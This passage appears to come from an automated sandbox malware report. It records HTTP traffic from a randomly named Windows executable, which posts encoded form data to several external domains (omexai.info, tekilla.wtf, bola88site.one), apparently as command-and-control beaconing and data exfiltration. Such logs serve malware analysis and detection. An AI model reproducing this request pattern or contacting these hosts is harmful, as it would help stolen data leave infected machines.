                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:34:09.576822042 CEST541INHTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Tue, 08 Oct 2024 14:34:09 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.elsupertodo.net/2jit/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=
                                                                        X-XSS-Protection: 1; mode=block
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.4498073.33.130.190802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:24.676636934 CEST809OUTPOST /7xi5/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.omexai.info
                                                                        Origin: http://www.omexai.info
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.omexai.info/7xi5/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 76 7a 67 59 35 44 63 68 62 55 54 75 44 6a 34 66 55 36 59 48 75 70 73 47 53 50 58 6d 52 46 49 67 6c 35 4a 41 74 2b 4d 75 37 6a 4c 74 48 52 35 37 37 73 30 70 67 61 79 37 52 48 78 61 61 51 4a 56 73 42 44 31 78 47 70 2b 6d 36 66 2f 53 36 35 79 43 72 38 56 5a 44 76 44 44 6a 48 7a 6a 31 32 43 74 62 6f 53 38 53 77 4e 65 63 42 37 34 37 61 6b 62 4c 6f 74 59 51 52 6f 4b 57 73 4f 69 72 6f 61 47 55 5a 53 6c 65 50 4f 47 57 6a 79 37 79 73 35 65 4e 69 47 54 71 6e 6e 34 39 35 72 6b 77 52 65 35 68 62 58 62 50 76 38 4f 73 4c 6a 43 41 63 70 71 6d 51 4f 6f 31 57 70 61 75 35 41 4e 48 76 56 73 67 3d 3d
                                                                        Data Ascii: -NnllVvH=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5hbXbPv8OsLjCAcpqmQOo1Wpau5ANHvVsg==


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.4498203.33.130.190802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:27.228100061 CEST829OUTPOST /7xi5/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.omexai.info
                                                                        Origin: http://www.omexai.info
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.omexai.info/7xi5/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 51 6a 74 48 77 4a 37 36 75 63 70 6c 61 79 37 4a 33 78 47 55 77 4a 43 73 42 66 4c 78 43 74 2b 6d 2b 2f 2f 53 36 4a 79 43 59 55 61 44 7a 76 4e 58 54 48 78 2b 46 32 43 74 62 6f 53 38 53 30 33 65 63 70 37 34 72 71 6b 61 70 4d 69 56 77 52 76 63 6d 73 4f 6d 72 6f 57 47 55 5a 4b 6c 65 2b 47 47 55 72 79 37 79 63 35 65 5a 2b 48 49 61 6e 62 31 64 34 66 71 78 31 57 2b 51 66 65 55 50 72 38 52 76 37 42 4b 6d 4e 7a 37 58 78 5a 36 31 79 61 48 70 77 30 41 45 53 63 33 69 54 2b 67 66 35 51 71 53 47 55 69 43 73 2b 4a 31 4d 77 62 6f 55 3d
                                                                        Data Ascii: -NnllVvH=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ61yaHpw0AESc3iT+gf5QqSGUiCs+J1MwboU=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.4498383.33.130.190802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:29.774672031 CEST10911OUTPOST /7xi5/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.omexai.info
                                                                        Origin: http://www.omexai.info
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.omexai.info/7xi5/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 76 7a 67 59 35 44 63 68 62 55 54 75 43 44 49 66 59 35 77 48 2f 35 73 4a 58 50 58 6d 66 56 49 73 6c 35 4e 41 74 2f 59 45 37 57 37 74 48 69 42 37 34 50 63 70 6d 61 79 37 41 58 78 46 55 77 4a 66 73 42 48 50 78 43 68 49 6d 34 7a 2f 54 5a 42 79 4b 4a 55 61 4e 44 76 4e 49 44 48 30 6a 31 32 79 74 62 35 56 38 54 45 33 65 63 70 37 34 70 43 6b 64 37 6f 69 47 67 52 6f 4b 57 73 43 69 72 70 44 47 55 42 30 6c 61 69 57 48 6c 4c 79 34 53 4d 35 66 73 69 48 45 61 6e 6a 79 64 34 48 71 78 49 49 2b 55 2b 6e 55 4d 32 62 52 6f 4c 42 4f 43 55 30 6e 57 46 79 6c 44 75 51 53 62 6b 33 4c 30 71 63 35 77 7a 78 7a 4e 35 32 2f 52 75 72 6d 31 42 42 61 45 4e 7a 59 34 6d 75 48 76 70 76 69 6b 48 48 6c 53 7a 31 7a 43 74 57 43 38 71 69 6b 4d 72 33 64 71 62 31 73 74 45 2f 4f 4d 62 4f 4b 4c 7a 75 72 46 37 62 61 78 58 63 75 6a 36 39 43 6b 76 65 7a 76 34 2b 48 66 53 7a 31 65 68 67 4a 78 36 72 6f 50 4a 6b 67 30 6a 76 45 78 4b 37 4b 58 7a 79 34 53 59 45 6b 57 51 73 52 58 79 6a 62 6f 67 69 2b 65 7a 2b 70 75 63 50 79 [TRUNCATED]
                                                                        Data Ascii: -NnllVvH=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7W7tHiB74Pcpmay7AXxFUwJfsBHPxChIm4z/TZByKJUaNDvNIDH0j12ytb5V8TE3ecp74pCkd7oiGgRoKWsCirpDGUB0laiWHlLy4SM5fsiHEanjyd4HqxII+U+nUM2bRoLBOCU0nWFylDuQSbk3L0qc5wzxzN52/Rurm1BBaENzY4muHvpvikHHlSz1zCtWC8qikMr3dqb1stE/OMbOKLzurF7baxXcuj69Ckvezv4+HfSz1ehgJx6roPJkg0jvExK7KXzy4SYEkWQsRXyjbogi+ez+pucPyCa9AoYlGLu+jqcDvYWLfYd1qkMYV6LVQ9Dk4aY7/ItPKefbKZFtJy7Iab/I4C62tzudCGJYKTbcYpS1Qa92uzzxmtA3tpkeBWhlujEJx17XyhLgkBzRjNt723uss0BOc3fgeDC50sw2kb3bZij8VA4let57uGhDUTlXykKt5Sz/vP9rOJxq5c2fe2ECl0ay7bebXd0dFxS9hgU5cHKSBfhMglLlObVRwKMKe0dT5jKaLh1pq3oiAu3UAiC7wQVK/TH3qB7EJ5i0kjnjBh5v7ygB+JacoYfibrLerAPMWUoUDWD5fQDF0CjF04dozODAOZ72ZQEkVTRz4A2fp8zufnhV5ngxHYGNnv+91izWf01awE3pJGIvFGgykpT1kU9Xubmzy8cOAK5mdINtrOLF0IT+x87Me70nhuSGKleYM6Mqumao8lvlmO8P9rJydt5d6wlvrE0tr4yA0mCof8uVT6wDlJNnpvqOXXqi85vn1ZTSkNmmH8FjcSuQEbl6/+oPKVNVtiYNJsta2f6zjqLWuXxkjmT4SRK/xgcL5xoIr7gqO25UxQr7P/NTnr/qXDlizBL9m6phnJa3XcMIrsRPdDAEdsAUm4frUKn7/sPJUqaq861FLMcHqxEMjjGym01CfcCGyhjrAJVJouOwl9j6rYXCcVfZREk4mky [TRUNCATED]


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.4498543.33.130.190802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:32.318255901 CEST554OUTGET /7xi5/?-NnllVvH=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&e6mhx=LZwxPLrhqt_8A HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.omexai.info
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:34:32.772227049 CEST404INHTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Tue, 08 Oct 2024 14:34:32 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 264
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 2d 4e 6e 6c 6c 56 76 48 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 36 64 35 39 53 76 70 67 44 42 2b 7a 71 53 46 41 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 74 6f 50 4b 47 55 73 2f 61 54 31 66 6b 44 6e 63 78 51 52 66 6c 70 71 4a 56 75 4e 51 46 62 45 4c 42 78 2f 2b 50 45 58 72 70 46 36 33 75 70 74 46 32 67 77 4b 41 63 4e 61 6f 4a 65 6c 5a 34 35 69 48 48 34 3d 26 65 36 6d 68 78 3d 4c 5a 77 78 50 4c 72 68 71 74 5f 38 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-NnllVvH=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&e6mhx=LZwxPLrhqt_8A"}</script></head></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.449884172.191.244.62802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:38.419114113 CEST809OUTPOST /fpzw/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.tekilla.wtf
                                                                        Origin: http://www.tekilla.wtf
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 5a 59 70 59 62 77 72 56 71 75 6a 52 30 5a 66 55 35 75 31 65 7a 36 63 32 6e 5a 55 78 52 71 58 4e 76 64 6a 36 69 61 68 4c 38 57 43 31 41 56 38 56 36 31 4f 58 47 67 54 34 35 35 6e 38 56 56 43 54 6f 43 59 32 36 33 44 33 5a 44 59 46 61 77 44 31 4b 70 49 64 36 79 42 73 35 59 7a 4a 64 66 56 31 66 73 41 55 30 37 68 72 75 6f 75 49 5a 68 31 45 33 65 6d 56 61 43 49 6f 66 53 72 64 58 67 50 65 4b 64 52 66 76 79 6c 4e 41 2b 47 54 56 6f 7a 55 54 6a 41 61 43 64 2b 66 31 69 2b 75 2b 79 6f 68 58 41 73 6f 43 57 70 4e 57 4e 4e 6c 34 78 69 6e 77 6b 34 4d 51 3d 3d
                                                                        Data Ascii: -NnllVvH=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAaCd+f1i+u+yohXAsoCWpNWNNl4xinwk4MQ==
                                                                        Oct 8, 2024 16:34:38.867480040 CEST195INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        X-Content-Type-Options: nosniff
                                                                        Date: Tue, 08 Oct 2024 14:34:38 GMT
                                                                        Content-Length: 19
                                                                        Connection: close
                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                        Data Ascii: 404 page not found


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.449898172.191.244.62802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:40.963867903 CEST829OUTPOST /fpzw/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.tekilla.wtf
                                                                        Origin: http://www.tekilla.wtf
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 225
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 69 65 58 4e 4c 5a 6a 37 6a 61 68 46 63 57 43 37 67 55 33 62 61 31 48 58 47 73 62 34 35 56 6e 38 56 70 43 54 70 53 59 32 4a 66 43 78 4a 44 47 4e 36 77 42 34 71 70 49 64 36 79 42 73 35 4e 57 4a 63 33 56 30 75 63 41 47 41 58 75 6a 4f 6f 74 59 70 68 31 56 6e 65 69 56 61 43 2b 6f 64 6d 53 64 56 6f 50 65 4c 74 52 52 65 79 6d 61 77 2b 36 4f 6c 70 45 53 6a 53 37 52 54 6b 33 58 6b 4b 5a 68 65 36 6b 74 78 52 32 35 7a 33 2b 66 57 70 2b 34 2f 34 57 71 7a 5a 78 58 65 54 50 6c 75 58 57 6b 71 65 7a 52 6e 2b 31 39 61 4c 57 69 32 67 3d
                                                                        Data Ascii: -NnllVvH=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWp+4/4WqzZxXeTPluXWkqezRn+19aLWi2g=
                                                                        Oct 8, 2024 16:34:41.457806110 CEST195INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        X-Content-Type-Options: nosniff
                                                                        Date: Tue, 08 Oct 2024 14:34:41 GMT
                                                                        Content-Length: 19
                                                                        Connection: close
                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                        Data Ascii: 404 page not found


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.449915172.191.244.62802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:43.707895994 CEST10911OUTPOST /fpzw/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.tekilla.wtf
                                                                        Origin: http://www.tekilla.wtf
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 10305
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.tekilla.wtf/fpzw/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 6a 6d 58 4e 65 4e 6a 36 41 79 68 45 63 57 43 6c 77 55 30 62 61 30 48 58 46 63 66 34 35 4a 5a 38 51 74 43 51 4f 53 59 30 34 66 43 34 4a 44 47 50 36 77 45 31 4b 70 64 64 35 61 4e 73 35 64 57 4a 63 33 56 30 74 30 41 52 45 37 75 6c 4f 6f 75 49 5a 68 68 45 33 65 4b 56 5a 79 75 6f 64 79 64 65 6b 49 50 65 72 39 52 54 73 71 6d 59 51 2b 34 4e 6c 70 63 53 6a 65 6b 52 54 34 52 58 6b 4f 6a 68 63 6d 6b 38 32 55 79 67 6e 44 79 65 41 35 6b 73 50 38 43 76 68 78 64 53 2b 7a 48 74 73 2f 4b 38 2b 61 74 53 47 62 72 67 5a 47 63 78 52 74 45 55 79 4a 76 34 4a 2b 34 50 34 67 33 32 6f 61 52 47 52 57 59 6a 68 34 61 58 6c 61 53 6b 6a 4f 44 65 59 37 70 36 6f 30 73 52 4d 4b 35 33 64 58 69 30 75 6f 62 45 5a 57 43 2b 6d 55 4e 59 72 59 6b 4a 65 50 30 52 59 4c 44 36 30 53 6d 57 69 79 4b 47 51 75 4f 39 51 49 31 41 42 53 2f 2f 4a 64 6e 77 4f 7a 41 74 41 30 71 69 74 4f 6e 72 38 54 41 34 [TRUNCATED]
                                                                        Data Ascii: -NnllVvH=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExjmXNeNj6AyhEcWClwU0ba0HXFcf45JZ8QtCQOSY04fC4JDGP6wE1Kpdd5aNs5dWJc3V0t0ARE7ulOouIZhhE3eKVZyuodydekIPer9RTsqmYQ+4NlpcSjekRT4RXkOjhcmk82UygnDyeA5ksP8CvhxdS+zHts/K8+atSGbrgZGcxRtEUyJv4J+4P4g32oaRGRWYjh4aXlaSkjODeY7p6o0sRMK53dXi0uobEZWC+mUNYrYkJeP0RYLD60SmWiyKGQuO9QI1ABS//JdnwOzAtA0qitOnr8TA4DgVC7LBY8+qhSr0XTj5OxMcNbSZtqumPVNiHtWWiKhdFi++VPR+3vndiPrCg7XC3vWizSfiM1kMtB6Xwo/JF4FUxcS0kSGgxzaEVqOZRJQnIu57k9RZW6THvXpoMOyj2V5fgZa8gQ5Ty77R56Ds2sEEOvE3GJoQR3Lk5ExT99N4GLkfZd+sCUwPvL9fv1OTsPTNDuAEZNUzWdwFZyxAPY0qBflB+VYTtzS80HVmcbpVhp1kTz14vTefYycn+6sxmnaQTNczHlzXMDU0JtWemFN3FGt8jk/HAWZNlaz6Y26M2lEVIHdd0wiFC3/4gwgJEWGD2tCW8g1i4XEaLp409IX5esyOj9nslhDlTi6Q6HtrD7J+kEzor7RVsbtnhP+nT7CGS96ByKQ034mbOrp2yT0g6PwfqShlUk5mF0hrgfwoWIfMatfob+OwxCmZ0O40s+BRBENVxD/TtVCm8VMpKJUQbbs00G+STS+GxhbK+A+m+xVUaABPUPytN5/WIPYdPonUMmvlZ7ChIHJwE25Rw/Jm586/b/g6jOSBwbVwGPHMSt3EdV5Gawq7ib/uZmMNqhJx0M2gK9LflCppDmXcLc2ckO8hjA9XZDN7qEzwnzB+6ZVTU/+nvNTqIfcnCAqXLepozGJGyw58eNigU4D5UZEFrFuE9onej9V [TRUNCATED]
                                                                        Oct 8, 2024 16:34:44.171924114 CEST195INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        X-Content-Type-Options: nosniff
                                                                        Date: Tue, 08 Oct 2024 14:34:44 GMT
                                                                        Content-Length: 19
                                                                        Connection: close
                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                        Data Ascii: 404 page not found


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        8192.168.2.449929172.191.244.62802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:46.256012917 CEST554OUTGET /fpzw/?e6mhx=LZwxPLrhqt_8A&-NnllVvH=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.tekilla.wtf
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Oct 8, 2024 16:34:46.735551119 CEST195INHTTP/1.1 404 Not Found
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        X-Content-Type-Options: nosniff
                                                                        Date: Tue, 08 Oct 2024 14:34:46 GMT
                                                                        Content-Length: 19
                                                                        Connection: close
                                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                        Data Ascii: 404 page not found


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        9192.168.2.449965172.96.191.39802844C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Oct 8, 2024 16:34:51.919229031 CEST818OUTPOST /3qit/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        Host: www.bola88site.one
                                                                        Origin: http://www.bola88site.one
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Content-Length: 205
                                                                        Connection: close
                                                                        Cache-Control: max-age=0
                                                                        Referer: http://www.bola88site.one/3qit/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                        Data Raw: 2d 4e 6e 6c 6c 56 76 48 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 55 49 4d 6a 66 6b 6f 31 6c 74 4e 35 2b 6b 65 6e 62 68 45 5a 73 78 54 46 46 39 6b 2b 30 2b 43 56 5a 77 3d 3d
